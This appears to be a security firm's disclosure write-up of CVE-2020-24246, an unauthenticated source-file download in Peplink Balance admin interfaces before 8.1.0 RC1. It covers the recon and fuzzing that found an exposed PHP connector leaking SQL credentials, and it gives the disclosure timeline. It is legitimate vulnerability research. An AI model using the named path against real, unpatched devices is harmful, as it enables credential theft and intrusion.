A few months ago, BSSI performed a penetration test on a perimeter that includes the web admin interface of Peplink Balance.
This article describes a vulnerability discovered by the BSSI auditing team, allowing an unauthenticated attacker to download certain source files from the web admin interface. In these files, it is possible to find sensitive information, including credentials for connecting a SQL database (DBMS). This affects the web admin interface of all Peplink Balance products (using a version before 8.1.0 RC1).
The web admin interface of Peplink Balance products allows to administrate and configure Peplink routers:
It is possible to try this product by using the admin / admin credentials here : http://balancedemo.peplink.com
Peplink-23005 : a lack of interpretation of certain source files
Since the penetration test has been performed in a black box, it was first necessary to understand how the administration and its environment work. An initial analysis of the interface was therefore carried out in three phases, in order to better understand its tree structure.
In a first time, a manual browsing of the application allowed us to discover that all files were located in /cgi-bin/MANGA and /cgi-bin/HASync. The extension of all discovered files is .cgi. This means that the web server is properly interpreting this extension before returning the output to the browser.
Then, OSINT researches allowed us to broaden our knowledge of entry points (still having the .cgi extension). This research is done using Google Dorks, GitHub repositories, and previous exploit disclosures, among other things.
Tip: OSINT researches through Google Dorks and GitHub repositories often uncovers new entry points without being detected by the targeted web server. Indeed, by definition, this research is based on the indexing (voluntary or not) of the web service.
Finally, automatic browsing through fuzzing of .cgi files and folders (using tools such as Dirb, Patator or WFuzz) was conducted. The fuzz uncovered the existence of the /filemanager/php/ folder. The name of the folder might suggest that there are .php files inside.
A second automatic browsing was then carried out by fuzzing folders and .php files, in order to better target the potential content present in the folder. A positive result was found: connector.php
Because the front web server does not interpret the PHP files, it allows us to directly download its source code.
This vulnerability therefore allows, through the exploitation of the non-interpretation of PHP files by the front web server, to access and download their source code.
Several sensitive files have been discovered, including an SQL configuration file useful for the ELFinder Framework. For the purposes of this article, the screenshot below corresponds to the file discovered on the Peplink Balance demo interface and does not contain sensitive data:
Upon discovery of the vulnerability, the BSSI auditing team contacted and reported the vulnerability to the corresponding Peplink team (responsible for the product). A patch was made available on July 2, 2020 (corresponding to version 8.1.0 RC1).
This vulnerability is now known as CVE 2020-24246 and is available in Peplink’s release notes (page 13 – 23005): https://download.peplink.com/resources/firmware-8.1.0rc1-release-notes.pdf
17/06/2020 – Discovery of the vulnerability
19/06/2020 – First contact with the Cyber-Security team of Peplink
22/06/2020 – Report of the vulnerability
03/07/2020 – The vulnerability is fixed using the 8.1.0 RC1 patch
03/10/2020 – Vulnerability disclosure (patch + 90 days)